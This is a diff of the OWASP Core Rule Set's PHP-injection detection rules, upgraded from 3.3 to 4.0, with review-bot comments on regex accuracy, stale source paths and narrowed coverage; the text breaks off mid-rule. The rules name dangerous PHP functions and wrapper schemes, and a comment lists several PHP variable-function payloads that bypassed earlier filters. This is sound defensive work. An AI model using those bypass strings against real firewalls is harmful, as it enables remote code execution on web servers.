@@ -79,13 +79,13 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # .php file and have the code within it executed on the server. # # Also block files with just dot (.) characters after the extension: -# https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla +# https://www.rapid7.com/blog/post/2013/08/15/time-to-patch-joomla/ # # Some AJAX uploaders use the nonstandard request headers X-Filename, # X_Filename, or X-File-Name to transmit the file name to the server; # scan these request headers as well as multipart/form-data file names. # -SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\.*$" \ +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.ph(?:p\d*|tml|ar|ps|t|pt)\.*$" \ "id:933110,\ phase:2,\ block,\ @@ -100,11 +100,10 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -115,9 +114,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:normalisePath,t:lowercase,\ + t:none,t:normalisePath,\ msg:'PHP Injection Attack: Configuration Directive Found',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.933120_TX_0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ 
@@ -125,14 +124,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.933120_tx_0=%{tx.0}',\ chain" SecRule MATCHED_VARS "@pm =" \ "capture,\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -143,7 +142,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:normalisePath,t:urlDecodeUni,t:lowercase,\ + t:none,t:normalisePath,t:urlDecodeUni,\ msg:'PHP Injection Attack: Variables Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -153,11 +152,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -190,11 +188,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # 
@@ -205,7 +202,15 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # could lead to RCE as describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even # wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:zlib|glob|phar|ssh2|rar|ogg|expect|zip)://" \ +# Valid PHP wrappers can be found in the PHP documentation here: +# https://www.php.net/manual/en/wrappers.php +# +# Regular expression generated from regex-assembly/933200.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933200 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://" \ "id:933200,\ phase:2,\ block,\ @@ -219,11 +224,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # 
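Review bot: In the new 933200 expression the `.` inside `ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?` is an unescaped metacharacter, so it matches any single character instead of the literal dot of the `ssh2.shell` / `ssh2.exec` wrapper names the comment points to in the PHP documentation; in regex-assembly/933200.ra it should be written `\.` and the rule regenerated with `crs-toolchain regex update 933200`. The practical effect is only a slightly wider match, but a generated pattern should express what its source means. Separately, the removed line carried an inline `(?i:…)` flag and the new one has none; the rule's transformation list is outside this hunk, so if it does not apply `t:lowercase`, mixed-case scheme names are no longer covered — worth confirming before merge.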
@@ -246,7 +250,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # false positives in natural language or other contexts. # Examples: 'chr', 'eval'. # To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'. -# Regexp is generated from function names in util/regexp-assemble/regexp-933160.data +# Regexp is generated from function names in /regexp-assemble/data/933160.ra # # - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords. # Examples: 'addslashes', 'array_diff'. @@ -260,7 +264,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # Examples: 'abs', 'cos'. # To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'. # This rule only runs in paranoia level 3 or higher. -# Regexp is generated from function names in util/regexp-assemble/regexp-933161.data +# Regexp is generated from function names in /regexp-assemble/data/933161.ra # @@ -277,7 +281,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F phase:2,\ block,\ capture,\ - t:none,t:lowercase,\ + t:none,\ msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -287,11 +291,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # 
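Review bot: The updated comment in this hunk cites `/regexp-assemble/data/933160.ra`, while the 933160 rule header later in this same file says `regex-assembly/933160.ra` and names `crs-toolchain regex update 933160` as the regeneration step, so one of the two paths is stale. The same mismatch applies to `/regexp-assemble/data/933161.ra` in the next hunk (`@@ -260,7 +264,7 @@`). Suggested wording: `# Regexp is generated from function names in regex-assembly/933160.ra` (and `regex-assembly/933161.ra` respectively), so readers are sent to the same source the rule header cites.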
@@ -315,18 +318,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # system //comment \n (...) # system #comment \n (...) # -# This rule is also triggered by the following exploit(s): +# This rule is triggered by the following exploits as well, as they include the string 'exec(...)': # [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ] # [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ] # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-933160.data using Regexp::Assemble. -# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. -# -# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble -# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" +# Regular expression generated from regex-assembly/933160.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933160 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create|socket_client)|ipc?slashes|rev)|implexml_load_(?:string|file)|ocket_c(?:onnect|reate)|h(?:ow_sourc|a1_fil)e|pl_autoload_register|ystem)|p(?:r(?:eg_(?:replace(?:_callback(?:_array)?)?|match(?:_all)?|split)|oc_(?:(?:terminat|clos|nic)e|get_status|open)|int_r)|o(?:six_(?:get(?:(?:e[gu]|g)id|login|pwnam)|mk(?:fifo|nod)|ttyname|kill)|pen)|hp(?:_(?:strip_whitespac|unam)e|version|info)|g_(?:(?:execut|prepar)e|connect|query)|a(?:rse_(?:ini_file|str)|ssthru)|utenv)|r(?:unkit_(?:function_(?:re(?:defin|nam)e|copy|add)|method_(?:re(?:defin|nam)e|copy|add)|constant_(?:redefine|add))|e(?:(?:gister_(?:shutdown|tick)|name)_function|ad(?:(?:gz)?file|_exif_data|dir))|awurl(?:de|en)code)|i(?:mage(?:createfrom(?:(?:jpe|pn)g|x[bp]m|wbmp|gif)|(?:jpe|pn)g|g(?:d2?|if)|2?wbmp|xbm)|s_(?:(?:(?:execut|write?|read)ab|fi)le|dir)|ni_(?:get(?:_all)?|set)|terator_apply|ptcembed)|g(?:et(?:_(?:c(?:urrent_use|fg_va)r|meta_tags)|my(?:[gpu]id|inode)|(?:lastmo|cw)d|imagesize|env)|z(?:(?:(?:defla|wri)t|encod|fil)e|compress|open|read)|lob)|a(?:rray_(?:u(?:intersect(?:_u?assoc)?|diff(?:_u?assoc)?)|intersect_u(?:assoc|key)|diff_u(?:assoc|key)|filter|reduce|map)|ssert(?:_options)?)|h(?:tml(?:specialchars(?:_decode)?|_entity_decode|entities)|(?:ash(?:_(?:update|hmac))?|ighlight)_file|e(?:ader_register_callback|x2bin))|f(?:i(?:le(?:(?:[acm]tim|inod)e|(?:_exist|perm)s|group)?|nfo_open)|tp_(?:nb_(?:ge|pu)|connec|ge|pu)t|(?:unction_exis|pu)ts|write|open)|o(?:b_(?:get_
(?:c(?:ontents|lean)|flush)|end_(?:clean|flush)|clean|flush|start)|dbc_(?:result(?:_all)?|exec(?:ute)?|connect)|pendir)|m(?:b_(?:ereg(?:_(?:replace(?:_callback)?|match)|i(?:_replace)?)?|parse_str)|(?:ove_uploaded|d5)_file|ethod_exists|ysql_query|kdir)|e(?:x(?:if_(?:t(?:humbnail|agname)|imagetype|read_data)|ec)|scapeshell(?:arg|cmd)|rror_reporting|val)|c(?:url_(?:file_create|exec|init)|onvert_uuencode|reate_function|hr)|u(?:n(?:serialize|pack)|rl(?:de|en)code|[ak]?sort)|(?:json_(?:de|en)cod|debug_backtrac|tmpfil)e|b(?:(?:son_(?:de|en)|ase64_en)code|zopen)|var_dump)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|file(?:group)?|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|md5|o(?:pendir|rd)|p(?:assthru|open|rev)|(?:read|tmp)file|un(?:pac|lin)k|s(?:tat|ubstr|ystem))(?:/(?:\*.*\*/|/.*)|#.*|[\s\v\"])*[\"']*\)?[\s\v]*\(.*\)" \ "id:933160,\ phase:2,\ block,\ @@ -341,11 +343,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -362,7 +363,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # unserialize() call, resulting in an arbitrary PHP object(s) injection into the # application scope. # -# https://www.owasp.org/index.php/PHP_Object_Injection +# https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection # # In serialized form, PHP objects have the following format: # 
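Review bot: The regenerated 933160 list is far shorter than the one it replaces — names present on the removed side such as `proc_open`, `escapeshellcmd`, `curl_exec` and `unserialize` no longer appear in the new alternation — yet the comment block in this hunk says nothing about the narrowing. The rule-family comment visible earlier in this file describes 933151 as the "~1300 words of lesser importance" list; if those names moved there they now score only at PL2, and if they were dropped from regex-assembly altogether PL1 loses them entirely, but I cannot see 933151's list from this diff. Whichever is the case, the comment should state it, e.g. `# Names removed from 933160 in 4.0 are covered by 933151 (PL2).`, so that the PL1/PL2 split stays auditable.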
@@ -370,7 +371,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # O:3:"Foo":0:{} # # Also detected are PHP objects with a custom unserializer: -# http://www.phpinternalsbook.com/classes_objects/serialization.html +# https://www.phpinternalsbook.com/php5/classes_objects/serialization.html # These have the following format: # # C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}} @@ -397,11 +398,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -453,24 +453,24 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ PHP Functions: Variable Function Prevent Bypass ] # # Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ +# Regex test on https://regex101.com/r/x1tfXG/1 # the rule 933180 could be bypassed by using the following payloads: # -# - (system)('uname') -# - (sy.(st).em)('uname') -# - (string)"system"('uname') -# - define('x', 'sys' . 'tem');(x)/* comment */('uname') -# - $y = 'sys'.'tem';($y)('uname') +# - (system)('uname'); +# - (sy.(st).em)('uname'); +# - (string)"system"('uname'); +# - define('x', 'sys' . 'tem');(x)/* comment */('uname'); +# - $y = 'sys'.'tem';($y)('uname'); # - define('z', [['sys' .'tem']]);(z)[0][0]('uname'); -# - (system)(ls) +# - (system)(ls); # - (/**/system)(ls/**/); # - (['system'])[0]('uname'); # - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++); 
@@ -480,12 +480,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # - [ACME] this is a test (just a test) # - Test (with two) rounded (brackets) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:\(|\[)[a-zA-Z0-9_.$\"'\[\](){}/*\s]+(?:\)|\])[0-9_.$\"'\[\](){}/*\s]*\([a-zA-Z0-9_.$\"'\[\](){}/*\s].*\)|\([\s]*string[\s]*\)[\s]*(?:\"|'))" \ +# Regular expression generated from regex-assembly/933210.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933210 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:\((?:.+\)(?:[\"'][\-0-9A-Z_a-z]+[\"'])?\(.+|[^\)]*string[^\)]*\)[\s\v\"'\--\.0-9A-\[\]_a-\{\}]+\([^\)]*)|(?:\[[0-9]+\]|\{[0-9]+\}|\$[^\(-\),\.-/;\x5c]+|[\"'][\-0-9A-Z\x5c_a-z]+[\"'])\(.+)\);" \ "id:933210,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecode,t:replaceComments,t:compressWhitespace,\ + t:none,t:urlDecode,t:replaceComments,t:removeWhitespace,\ msg:'PHP Injection Attack: Variable Function Call Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ 
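Review bot: The new 933210 expression ends in `\);`, so it now requires the call to be followed by a literal `;`, and the example list in the previous hunk was edited to append `;` to every payload, but the comment block in this hunk never states that requirement; a reader cannot tell whether the trailing semicolon is an intentional false-positive guard or an artefact of assembly. Suggest adding, above the `crs-toolchain regex update 933210` line, `# Note: the pattern requires the statement terminator ';' after the closing parenthesis.` Also, `t:compressWhitespace` was replaced by `t:removeWhitespace`, which strips all whitespace before matching, so the `[\s\v…]` members of the character classes can no longer match anything; harmless, but a one-line remark in 933210.ra would stop a future editor from trying to "fix" them.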
@@ -495,16 +500,15 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # # @@ -529,9 +533,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F phase:2,\ block,\ capture,\ - t:none,t:lowercase,\ + t:none,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.933151_TX_0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ 
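Review bot: `t:lowercase` is dropped from 933151 in the second hunk on this line, but the operator it fed is above the hunk and not visible here; the removal is only safe if that operator matches case-insensitively (`@pm`/`@pmFromFile` do, a bare `@rx` without `(?i)` does not), so please confirm against the operator line. The new `logdata` reads `%{TX.933151_TX_0}`, which only exists because the chain starter in the next hunk stashes `tx.0` before the chained `capture` overwrites it; a comment such as `# logdata uses tx.933151_tx_0: the chained capture below replaces TX.0 with the matched "("` on the logdata line would make that coupling explicit. Both the operator and the rest of the action list lie outside this hunk.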
@@ -539,22 +543,22 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.933151_tx_0=%{tx.0}',\ chain" SecRule MATCHED_VARS "@pm (" \ "capture,\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # # 
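Review bot: The added `setvar:'tx.933151_tx_0=%{tx.0}'` carries no explanation, and a reader of the chain starter alone cannot see that the chained `SecRule MATCHED_VARS "@pm ("` with `capture` will overwrite `TX.0`; suggest `# Preserve the function name matched above for logdata: the chained capture below replaces TX.0.` directly before the setvar. If I read ModSecurity's chain semantics right, non-disruptive actions of the starter run as soon as it matches, so `tx.933151_tx_0` is also set when the `@pm (` check fails; that is harmless because nothing logs it in that case, but it is worth stating in the same comment. Scoring stays on the last rule of the chain, which is the right place for it. The starter's operator and earlier actions are outside the hunk.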
@@ -573,12 +577,13 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAf # regex in this case to look for these values whereas in its sibling rule we use # @pmFromFile for flexibility and performance. # -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl < regexp-933131.data +# Regular expression generated from regex-assembly/933131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933131 # # This rule is a stricter sibling of rule 933130. -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:HTTP_(?:ACCEPT(?:_(?:ENCODING|LANGUAGE|CHARSET))?|(?:X_FORWARDED_FO|REFERE)R|(?:USER_AGEN|HOS)T|CONNECTION|KEEP_ALIVE)|PATH_(?:TRANSLATED|INFO)|ORIG_PATH_INFO|QUERY_STRING|REQUEST_URI|AUTH_TYPE)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx AUTH_TYPE|HTTP_(?:ACCEPT(?:_(?:CHARSET|ENCODING|LANGUAGE))?|CONNECTION|(?:HOS|USER_AGEN)T|KEEP_ALIVE|(?:REFERE|X_FORWARDED_FO)R)|ORIG_PATH_INFO|PATH_(?:INFO|TRANSLATED)|QUERY_STRING|REQUEST_URI" \ "id:933131,\ phase:2,\ block,\ @@ -593,11 +598,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # 
@@ -618,13 +622,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ] # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-933161.data using Regexp::Assemble. -# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. -# -# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble -# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" +# Regular expression generated from regex-assembly/933161.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933161 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx 
